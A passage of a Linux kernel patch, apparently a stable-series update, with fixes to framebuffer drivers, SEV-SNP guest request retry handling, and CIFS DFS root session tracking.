++	rc = pci_enable_device(dp);
++	if (rc < 0) {
+ 		dev_err(&dp->dev, "Cannot enable PCI device\n");
+ 		goto err_out;
+ 	}
+ 
+-	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0)
++	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 	addr = pci_resource_start(dp, 0);
+-	if (addr == 0)
++	if (addr == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 
+ 	p = framebuffer_alloc(0, &dp->dev);
+ 	if (p == NULL) {
+@@ -417,7 +422,8 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 
+ 	init_chips(p, addr);
+ 
+-	if (register_framebuffer(p) < 0) {
++	rc = register_framebuffer(p);
++	if (rc < 0) {
+ 		dev_err(&dp->dev,"C&T 65550 framebuffer failed to register\n");
+ 		goto err_unmap;
+ 	}
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index 583cbcf094467..a3cf1f764f29b 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -309,17 +309,18 @@ void fb_deferred_io_open(struct fb_info *info,
+ 			 struct inode *inode,
+ 			 struct file *file)
+ {
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
+ 	file->f_mapping->a_ops = &fb_deferred_io_aops;
++	fbdefio->open_count++;
+ }
+ EXPORT_SYMBOL_GPL(fb_deferred_io_open);
+ 
+-void fb_deferred_io_release(struct fb_info *info)
++static void fb_deferred_io_lastclose(struct fb_info *info)
+ {
+-	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 	struct page *page;
+ 	int i;
+ 
+-	BUG_ON(!fbdefio);
+ 	cancel_delayed_work_sync(&info->deferred_work);
+ 
+ 	/* clear out the mapping that we setup */
+@@ -328,13 +329,21 @@ void fb_deferred_io_release(struct fb_info *info)
+ 		page->mapping = NULL;
+ 	}
+ }
++
++void fb_deferred_io_release(struct fb_info *info)
++{
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
++	if (!--fbdefio->open_count)
++		fb_deferred_io_lastclose(info);
++}
+ EXPORT_SYMBOL_GPL(fb_deferred_io_release);
+ 
+ void fb_deferred_io_cleanup(struct fb_info *info)
+ {
+ 	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 
+-	fb_deferred_io_release(info);
++	fb_deferred_io_lastclose(info);
+ 
+ 	kvfree(info->pagerefs);
+ 	mutex_destroy(&fbdefio->lock);
+diff --git a/drivers/video/fbdev/stifb.c b/drivers/video/fbdev/stifb.c
+index 3feb6e40d56d8..ef8a4c5fc6875 100644
+--- a/drivers/video/fbdev/stifb.c
++++ b/drivers/video/fbdev/stifb.c
+@@ -921,6 +921,28 @@ SETUP_HCRX(struct stifb_info *fb)
+ 
+ /* ------------------- driver specific functions --------------------------- */
+ 
++static int
++stifb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
++{
++	struct stifb_info *fb = container_of(info, struct stifb_info, info);
++
++	if (var->xres != fb->info.var.xres ||
++	    var->yres != fb->info.var.yres ||
++	    var->bits_per_pixel != fb->info.var.bits_per_pixel)
++		return -EINVAL;
++
++	var->xres_virtual = var->xres;
++	var->yres_virtual = var->yres;
++	var->xoffset = 0;
++	var->yoffset = 0;
++	var->grayscale = fb->info.var.grayscale;
++	var->red.length = fb->info.var.red.length;
++	var->green.length = fb->info.var.green.length;
++	var->blue.length = fb->info.var.blue.length;
++
++	return 0;
++}
++
+ static int
+ stifb_setcolreg(u_int regno, u_int red, u_int green,
+ 	      u_int blue, u_int transp, struct fb_info *info)
+@@ -1145,6 +1167,7 @@ stifb_init_display(struct stifb_info *fb)
+ 
+ static const struct fb_ops stifb_ops = {
+ 	.owner		= THIS_MODULE,
++	.fb_check_var	= stifb_check_var,
+ 	.fb_setcolreg	= stifb_setcolreg,
+ 	.fb_blank	= stifb_blank,
+ 	.fb_fillrect	= stifb_fillrect,
+@@ -1164,6 +1187,7 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	struct stifb_info *fb;
+ 	struct fb_info *info;
+ 	unsigned long sti_rom_address;
++	char modestr[32];
+ 	char *dev_name;
+ 	int bpp, xres, yres;
+ 
+@@ -1342,6 +1366,9 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	info->flags = FBINFO_HWACCEL_COPYAREA | FBINFO_HWACCEL_FILLRECT;
+ 	info->pseudo_palette = &fb->pseudo_palette;
+ 
++	scnprintf(modestr, sizeof(modestr), "%dx%d-%d", xres, yres, bpp);
++	fb_find_mode(&info->var, info, modestr, NULL, 0, NULL, bpp);
++
+ 	/* This has to be done !!! */
+ 	if (fb_alloc_cmap(&info->cmap, NR_PALETTE, 0))
+ 		goto out_err1;
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 7b4e9009f3355..46f1a8d558b0b 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -31,6 +31,9 @@
+ #define AAD_LEN		48
+ #define MSG_HDR_VER	1
+ 
++#define SNP_REQ_MAX_RETRY_DURATION	(60*HZ)
++#define SNP_REQ_RETRY_DELAY		(2*HZ)
++
+ struct snp_guest_crypto {
+ 	struct crypto_aead *tfm;
+ 	u8 *iv, *authtag;
+@@ -318,26 +321,14 @@ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8
+ 	return __enc_payload(snp_dev, req, payload, sz);
+ }
+ 
+-static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
+-				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
+-				u32 resp_sz, __u64 *fw_err)
++static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, __u64 *fw_err)
+ {
+-	unsigned long err;
+-	u64 seqno;
++	unsigned long err = 0xff, override_err = 0;
++	unsigned long req_start = jiffies;
++	unsigned int override_npages = 0;
+ 	int rc;
+ 
+-	/* Get message sequence and verify that its a non-zero */
+-	seqno = snp_get_msg_seqno(snp_dev);
+-	if (!seqno)
+-		return -EIO;
+-
+-	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+-
+-	/* Encrypt the userspace provided payload */
+-	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+-	if (rc)
+-		return rc;
+-
++retry_request:
+ 	/*
+ 	 * Call firmware to process the request. In this function the encrypted
+ 	 * message enters shared memory with the host. So after this call the
+@@ -345,18 +336,24 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent reuse of the IV.
+ 	 */
+ 	rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++	switch (rc) {
++	case -ENOSPC:
++		/*
++		 * If the extended guest request fails due to having too
++		 * small of a certificate data buffer, retry the same
++		 * guest request without the extended data request in
++		 * order to increment the sequence number and thus avoid
++		 * IV reuse.
++		 */
++		override_npages = snp_dev->input.data_npages;
++		exit_code	= SVM_VMGEXIT_GUEST_REQUEST;
+ 
+-	/*
+-	 * If the extended guest request fails due to having too small of a
+-	 * certificate data buffer, retry the same guest request without the
+-	 * extended data request in order to increment the sequence number
+-	 * and thus avoid IV reuse.
+-	 */
+-	if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-	    err == SNP_GUEST_REQ_INVALID_LEN) {
+-		const unsigned int certs_npages = snp_dev->input.data_npages;
+-
+-		exit_code = SVM_VMGEXIT_GUEST_REQUEST;
++		/*
++		 * Override the error to inform callers the given extended
++		 * request buffer size was too small and give the caller the
++		 * required buffer size.
++		 */
++		override_err	= SNP_GUEST_REQ_INVALID_LEN;
+ 
+ 		/*
+ 		 * If this call to the firmware succeeds, the sequence number can
+@@ -366,15 +363,20 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		 * of the VMPCK and the error code being propagated back to the
+ 		 * user as an ioctl() return code.
+ 		 */
+-		rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++		goto retry_request;
+ 
+-		/*
+-		 * Override the error to inform callers the given extended
+-		 * request buffer size was too small and give the caller the
+-		 * required buffer size.
+-		 */
+-		err = SNP_GUEST_REQ_INVALID_LEN;
+-		snp_dev->input.data_npages = certs_npages;
++	/*
++	 * The host may return SNP_GUEST_REQ_ERR_EBUSY if the request has been
++	 * throttled. Retry in the driver to avoid returning and reusing the
++	 * message sequence number on a different message.
++	 */
++	case -EAGAIN:
++		if (jiffies - req_start > SNP_REQ_MAX_RETRY_DURATION) {
++			rc = -ETIMEDOUT;
++			break;
++		}
++		schedule_timeout_killable(SNP_REQ_RETRY_DELAY);
++		goto retry_request;
+ 	}
+ 
+ 	/*
+@@ -386,7 +388,10 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	snp_inc_msg_seqno(snp_dev);
+ 
+ 	if (fw_err)
+-		*fw_err = err;
++		*fw_err = override_err ?: err;
++
++	if (override_npages)
++		snp_dev->input.data_npages = override_npages;
+ 
+ 	/*
+ 	 * If an extended guest request was issued and the supplied certificate
+@@ -394,29 +399,49 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent IV reuse. If the standard request was successful, return -EIO
+ 	 * back to the caller as would have originally been returned.
+ 	 */
+-	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++	if (!rc && override_err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
++	return rc;
++}
++
++static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
++				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
++				u32 resp_sz, __u64 *fw_err)
++{
++	u64 seqno;
++	int rc;
++
++	/* Get message sequence and verify that its a non-zero */
++	seqno = snp_get_msg_seqno(snp_dev);
++	if (!seqno)
+ 		return -EIO;
+ 
++	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
++
++	/* Encrypt the userspace provided payload */
++	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
++	if (rc)
++		return rc;
++
++	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+-			  rc, *fw_err);
+-		goto disable_vmpck;
++		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
++			return rc;
++
++		dev_alert(snp_dev->dev, "Detected error from ASP request. rc: %d, fw_err: %llu\n", rc, *fw_err);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	rc = verify_and_dec_payload(snp_dev, resp_buf, resp_sz);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected unexpected decode failure from ASP. rc: %d\n",
+-			  rc);
+-		goto disable_vmpck;
++		dev_alert(snp_dev->dev, "Detected unexpected decode failure from ASP. rc: %d\n", rc);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	return 0;
+-
+-disable_vmpck:
+-	snp_disable_vmpck(snp_dev);
+-	return rc;
+ }
+ 
+ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+@@ -703,6 +728,9 @@ static int __init sev_guest_probe(struct platform_device *pdev)
+ 	void __iomem *mapping;
+ 	int ret;
+ 
++	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
++		return -ENODEV;
++
+ 	if (!dev->platform_data)
+ 		return -ENODEV;
+ 
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 56b23def4c95d..d9876bd396fd4 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -419,6 +419,11 @@ skip_rdma:
+ 				   from_kuid(&init_user_ns, ses->linux_uid),
+ 				   from_kuid(&init_user_ns, ses->cred_uid));
+ 
++			if (ses->dfs_root_ses) {
++				seq_printf(m, "\n\tDFS root session id: 0x%llx",
++					   ses->dfs_root_ses->Suid);
++			}
++
+ 			spin_lock(&ses->chan_lock);
+ 			if (CIFS_CHAN_NEEDS_RECONNECT(ses, 0))
+ 				seq_puts(m, "\tPrimary channel: DISCONNECTED ");
+diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c
+index 2b1a8d55b4ec4..cb40074feb3e9 100644
+--- a/fs/cifs/cifs_dfs_ref.c
++++ b/fs/cifs/cifs_dfs_ref.c
+@@ -179,6 +179,7 @@ static struct vfsmount *cifs_dfs_do_automount(struct path *path)
+ 	tmp.source = full_path;
+ 	tmp.leaf_fullpath = NULL;
+ 	tmp.UNC = tmp.prepath = NULL;
++	tmp.dfs_root_ses = NULL;
+ 
+ 	rc = smb3_fs_context_dup(ctx, &tmp);
+ 	if (rc) {
+diff --git a/fs/cifs/cifs_fs_sb.h b/fs/cifs/cifs_fs_sb.h
+index 013a4bd65280c..6517591922801 100644
+--- a/fs/cifs/cifs_fs_sb.h
++++ b/fs/cifs/cifs_fs_sb.h
+@@ -61,8 +61,6 @@ struct cifs_sb_info {
+ 	/* only used when CIFS_MOUNT_USE_PREFIX_PATH is set */
+ 	char *prepath;
+ 
+-	/* randomly generated 128-bit number for indexing dfs mount groups in referral cache */
+-	uuid_t dfs_mount_id;
+ 	/*
+ 	 * Indicate whether serverino option was turned off later
+ 	 * (cifs_autodisable_serverino) in order to match new mounts.
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index cfdd5bf701a1c..5aaaa47dea410 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -1239,6 +1239,7 @@ struct cifs_tcon {
+ 	/* BB add field for back pointer to sb struct(s)? */
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ 	struct list_head ulist; /* cache update list */
++	struct list_head dfs_ses_list;
+ #endif
+ 	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
+ };
+@@ -1767,9 +1768,8 @@ struct cifs_mount_ctx {
+ 	struct TCP_Server_Info *server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+-	struct cifs_ses *root_ses;
+-	uuid_t mount_id;
+ 	char *origin_fullpath, *leaf_fullpath;
++	struct list_head dfs_ses_list;
+ };
+ 
+ static inline void free_dfs_info_param(struct dfs_info3_param *param)
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index af49ae53aaf40..5a889f5f5c3e5 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2278,6 +2278,7 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	 * need to lock before changing something in the session.
+ 	 */
+ 	spin_lock(&cifs_tcp_ses_lock);
++	ses->dfs_root_ses = ctx->dfs_root_ses;
+ 	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -3456,7 +3457,8 @@ int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+ 	bool isdfs;
+ 	int rc;
+ 
+-	uuid_gen(&mnt_ctx.mount_id);
++	INIT_LIST_HEAD(&mnt_ctx.dfs_ses_list);
++
+ 	rc = dfs_mount_share(&mnt_ctx, &isdfs);
+ 	if (rc)
+ 		goto error;
+@@ -3476,7 +3478,6 @@ int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+ 	kfree(cifs_sb->prepath);
+ 	cifs_sb->prepath = ctx->prepath;
+ 	ctx->prepath = NULL;
+-	uuid_copy(&cifs_sb->dfs_mount_id, &mnt_ctx.mount_id);
+ 
+ out:
+ 	cifs_try_adding_channels(cifs_sb, mnt_ctx.ses);
+@@ -3488,7 +3489,7 @@ out:
+ 	return rc;
+ 
+ error:
+-	dfs_cache_put_refsrv_sessions(&mnt_ctx.mount_id);
++	dfs_put_root_smb_sessions(&mnt_ctx.dfs_ses_list);
+ 	kfree(mnt_ctx.origin_fullpath);
+ 	kfree(mnt_ctx.leaf_fullpath);
+ 	cifs_mount_put_conns(&mnt_ctx);
+@@ -3686,9 +3687,6 @@ cifs_umount(struct cifs_sb_info *cifs_sb)
+ 	spin_unlock(&cifs_sb->tlink_tree_lock);
+ 
+ 	kfree(cifs_sb->prepath);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_put_refsrv_sessions(&cifs_sb->dfs_mount_id);
+-#endif
+ 	call_rcu(&cifs_sb->rcu, delayed_free);
+ }
+ 
+diff --git a/fs/cifs/dfs.c b/fs/cifs/dfs.c
+index b64d20374b9c8..c8bda52fa096c 100644
+--- a/fs/cifs/dfs.c
++++ b/fs/cifs/dfs.c
+@@ -95,25 +95,31 @@ static int get_session(struct cifs_mount_ctx *mnt_ctx, const char *full_path)
+ 	ctx->leaf_fullpath = (char *)full_path;
+ 	rc = cifs_mount_get_session(mnt_ctx);
+ 	ctx->leaf_fullpath = NULL;
+-	if (!rc) {
+-		struct cifs_ses *ses = mnt_ctx->ses;
+ 
+-		mutex_lock(&ses->session_mutex);
+-		ses->dfs_root_ses = mnt_ctx->root_ses;
+-		mutex_unlock(&ses->session_mutex);
+-	}
+ 	return rc;
+ }
+ 
+-static void set_root_ses(struct cifs_mount_ctx *mnt_ctx)
++static int get_root_smb_session(struct cifs_mount_ctx *mnt_ctx)
+ {
+-	if (mnt_ctx->ses) {
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct dfs_root_ses *root_ses;
++	struct cifs_ses *ses = mnt_ctx->ses;
++
++	if (ses) {
++		root_ses = kmalloc(sizeof(*root_ses), GFP_KERNEL);
++		if (!root_ses)
++			return -ENOMEM;
++
++		INIT_LIST_HEAD(&root_ses->list);
++
+ 		spin_lock(&cifs_tcp_ses_lock);
+-		mnt_ctx->ses->ses_count++;
++		ses->ses_count++;
+ 		spin_unlock(&cifs_tcp_ses_lock);
+-		dfs_cache_add_refsrv_session(&mnt_ctx->mount_id, mnt_ctx->ses);
++		root_ses->ses = ses;
++		list_add_tail(&root_ses->list, &mnt_ctx->dfs_ses_list);
+ 	}
+-	mnt_ctx->root_ses = mnt_ctx->ses;
++	ctx->dfs_root_ses = ses;
++	return 0;
+ }
+ 
+ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, const char *full_path,
+@@ -121,7 +127,8 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ {
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct dfs_info3_param ref = {};
+-	int rc;
++	bool is_refsrv = false;
++	int rc, rc2;
+ 
+ 	rc = dfs_cache_get_tgt_referral(ref_path + 1, tit, &ref);
+ 	if (rc)
+@@ -136,8 +143,7 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 	if (rc)
+ 		goto out;
+ 
+-	if (ref.flags & DFSREF_REFERRAL_SERVER)
+-		set_root_ses(mnt_ctx);
++	is_refsrv = !!(ref.flags & DFSREF_REFERRAL_SERVER);
+ 
+ 	rc = -EREMOTE;
+ 	if (ref.flags & DFSREF_STORAGE_SERVER) {
+@@ -146,13 +152,17 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 			goto out;
+ 
+ 		/* some servers may not advertise referral capability under ref.flags */
+-		if (!(ref.flags & DFSREF_REFERRAL_SERVER) &&
+-		    is_tcon_dfs(mnt_ctx->tcon))
+-			set_root_ses(mnt_ctx);
++		is_refsrv |= is_tcon_dfs(mnt_ctx->tcon);
+ 
+ 		rc = cifs_is_path_remote(mnt_ctx);
+ 	}
+ 
++	if (rc == -EREMOTE && is_refsrv) {
++		rc2 = get_root_smb_session(mnt_ctx);
++		if (rc2)
++			rc = rc2;
++	}
++
+ out:
+ 	free_dfs_info_param(&ref);
+ 	return rc;
+@@ -165,6 +175,7 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 	char *ref_path = NULL, *full_path = NULL;
+ 	struct dfs_cache_tgt_iterator *tit;
+ 	struct TCP_Server_Info *server;
++	struct cifs_tcon *tcon;
+ 	char *origin_fullpath = NULL;
+ 	int num_links = 0;
+ 	int rc;
+@@ -234,12 +245,22 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 
+ 	if (!rc) {
+ 		server = mnt_ctx->server;
++		tcon = mnt_ctx->tcon;
+ 
+ 		mutex_lock(&server->refpath_lock);
+-		server->origin_fullpath = origin_fullpath;
+-		server->current_fullpath = server->leaf_fullpath;
++		if (!server->origin_fullpath) {
++			server->origin_fullpath = origin_fullpath;
++			server->current_fullpath = server->leaf_fullpath;
++			origin_fullpath = NULL;
++		}
+ 		mutex_unlock(&server->refpath_lock);
+-		origin_fullpath = NULL;
++
++		if (list_empty(&tcon->dfs_ses_list)) {
++			list_replace_init(&mnt_ctx->dfs_ses_list,
++					  &tcon->dfs_ses_list);
++		} else {
++			dfs_put_root_smb_sessions(&mnt_ctx->dfs_ses_list);
++		}
+ 	}
+ 
+ out:
+@@ -260,7 +281,7 @@ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ 	rc = get_session(mnt_ctx, NULL);
+ 	if (rc)
+ 		return rc;
+-	mnt_ctx->root_ses = mnt_ctx->ses;
++	ctx->dfs_root_ses = mnt_ctx->ses;
+ 	/*
+ 	 * If called with 'nodfs' mount option, then skip DFS resolving.  Otherwise unconditionally
+ 	 * try to get an DFS referral (even cached) to determine whether it is an DFS mount.
+@@ -280,7 +301,9 @@ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ 	}
+ 
+ 	*isdfs = true;
+-	set_root_ses(mnt_ctx);
++	rc = get_root_smb_session(mnt_ctx);
++	if (rc)
++		return rc;
+ 
+ 	return __dfs_mount_share(mnt_ctx);
+ }
+diff --git a/fs/cifs/dfs.h b/fs/cifs/dfs.h
+index 344bea6d8bab1..13f26e01f7b97 100644
+--- a/fs/cifs/dfs.h
++++ b/fs/cifs/dfs.h
+@@ -10,6 +10,11 @@
+ #include "fs_context.h"
+ #include "cifs_unicode.h"
+ 
++struct dfs_root_ses {
++	struct list_head list;
++	struct cifs_ses *ses;
++};
++
+ int dfs_parse_target_referral(const char *full_path, const struct dfs_info3_param *ref,
+ 			      struct smb3_fs_context *ctx);
+ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs);
+@@ -22,9 +27,10 @@ static inline char *dfs_get_path(struct cifs_sb_info *cifs_sb, const char *path)
+ static inline int dfs_get_referral(struct cifs_mount_ctx *mnt_ctx, const char *path,
+ 				   struct dfs_info3_param *ref, struct dfs_cache_tgt_list *tl)
+ {
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+ 
+-	return dfs_cache_find(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
++	return dfs_cache_find(mnt_ctx->xid, ctx->dfs_root_ses, cifs_sb->local_nls,
+ 			      cifs_remap(cifs_sb), path, ref, tl);
+ }
+ 
+@@ -43,4 +49,15 @@ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ 							true);
+ }
+ 
++static inline void dfs_put_root_smb_sessions(struct list_head *head)
++{
++	struct dfs_root_ses *root, *tmp;
++
++	list_for_each_entry_safe(root, tmp, head, list) {
++		list_del_init(&root->list);
++		cifs_put_smb_ses(root->ses);
++		kfree(root);
++	}
++}
++
+ #endif /* _CIFS_DFS_H */
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index ac86bd0ebd637..1c59811bfa73a 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -49,17 +49,6 @@ struct cache_entry {
+ 	struct cache_dfs_tgt *tgthint;
+ };
+ 
+-/* List of referral server sessions per dfs mount */
+-struct mount_group {
+-	struct list_head list;
+-	uuid_t id;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES];
+-	int num_sessions;
+-	spinlock_t lock;
+-	struct list_head refresh_list;
+-	struct kref refcount;
+-};
+-
+ static struct kmem_cache *cache_slab __read_mostly;
+ static struct workqueue_struct *dfscache_wq __read_mostly;
+ 
+@@ -76,85 +65,10 @@ static atomic_t cache_count;
+ static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
+ static DECLARE_RWSEM(htable_rw_lock);
+ 
+-static LIST_HEAD(mount_group_list);
+-static DEFINE_MUTEX(mount_group_list_lock);
+-
+ static void refresh_cache_worker(struct work_struct *work);
+ 
+ static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
+ 
+-static void __mount_group_release(struct mount_group *mg)
+-{
+-	int i;
+-
+-	for (i = 0; i < mg->num_sessions; i++)
+-		cifs_put_smb_ses(mg->sessions[i]);
+-	kfree(mg);
+-}
+-
+-static void mount_group_release(struct kref *kref)
+-{
+-	struct mount_group *mg = container_of(kref, struct mount_group, refcount);
+-
+-	mutex_lock(&mount_group_list_lock);
+-	list_del(&mg->list);
+-	mutex_unlock(&mount_group_list_lock);
+-	__mount_group_release(mg);
+-}
+-
+-static struct mount_group *find_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	list_for_each_entry(mg, &mount_group_list, list) {
+-		if (uuid_equal(&mg->id, id))
+-			return mg;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-static struct mount_group *__get_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mg = find_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		return mg;
+-
+-	mg = kmalloc(sizeof(*mg), GFP_KERNEL);
+-	if (!mg)
+-		return ERR_PTR(-ENOMEM);
+-	kref_init(&mg->refcount);
+-	uuid_copy(&mg->id, id);
+-	mg->num_sessions = 0;
+-	spin_lock_init(&mg->lock);
+-	list_add(&mg->list, &mount_group_list);
+-	return mg;
+-}
+-
+-static struct mount_group *get_mount_group(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = __get_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		kref_get(&mg->refcount);
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	return mg;
+-}
+-
+-static void free_mount_group_list(void)
+-{
+-	struct mount_group *mg, *tmp_mg;
+-
+-	list_for_each_entry_safe(mg, tmp_mg, &mount_group_list, list) {
+-		list_del_init(&mg->list);
+-		__mount_group_release(mg);
+-	}
+-}
+-
+ /**
+  * dfs_cache_canonical_path - get a canonical DFS path
+  *
+@@ -704,7 +618,6 @@ void dfs_cache_destroy(void)
+ {
+ 	cancel_delayed_work_sync(&refresh_task);
+ 	unload_nls(cache_cp);
+-	free_mount_group_list();
+ 	flush_cache_ents();
+ 	kmem_cache_destroy(cache_slab);
+ 	destroy_workqueue(dfscache_wq);
+@@ -1111,54 +1024,6 @@ out_unlock:
+ 	return rc;
+ }
+ 
+-/**
+- * dfs_cache_add_refsrv_session - add SMB session of referral server
+- *
+- * @mount_id: mount group uuid to lookup.
+- * @ses: reference counted SMB session of referral server.
+- */
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses)
+-{
+-	struct mount_group *mg;
+-
+-	if (WARN_ON_ONCE(!mount_id || uuid_is_null(mount_id) || !ses))
+-		return;
+-
+-	mg = get_mount_group(mount_id);
+-	if (WARN_ON_ONCE(IS_ERR(mg)))
+-		return;
+-
+-	spin_lock(&mg->lock);
+-	if (mg->num_sessions < ARRAY_SIZE(mg->sessions))
+-		mg->sessions[mg->num_sessions++] = ses;
+-	spin_unlock(&mg->lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+-/**
+- * dfs_cache_put_refsrv_sessions - put all referral server sessions
+- *
+- * Put all SMB sessions from the given mount group id.
+- *
+- * @mount_id: mount group uuid to lookup.
+- */
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id)
+-{
+-	struct mount_group *mg;
+-
+-	if (!mount_id || uuid_is_null(mount_id))
+-		return;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = find_mount_group_locked(mount_id);
+-	if (IS_ERR(mg)) {
+-		mutex_unlock(&mount_group_list_lock);
+-		return;
+-	}
+-	mutex_unlock(&mount_group_list_lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+ /* Extract share from DFS target and return a pointer to prefix path or NULL */
+ static const char *parse_target_share(const char *target, char **share)
+ {
+@@ -1384,11 +1249,6 @@ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
+ 		cifs_dbg(FYI, "%s: not a dfs mount\n", __func__);
+ 		return 0;
+ 	}
+-
+-	if (uuid_is_null(&cifs_sb->dfs_mount_id)) {
+-		cifs_dbg(FYI, "%s: no dfs mount group id\n", __func__);
+-		return -EINVAL;
+-	}
+ 	/*
+ 	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
+ 	 * serverino. This prevents dentry revalidation to think the dentry are stale (ESTALE).
+diff --git a/fs/cifs/dfs_cache.h b/fs/cifs/dfs_cache.h
+index be3b5a44cf827..e0d39393035a9 100644
+--- a/fs/cifs/dfs_cache.h
++++ b/fs/cifs/dfs_cache.h
+@@ -40,8 +40,6 @@ int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iter
+ 			       struct dfs_info3_param *ref);
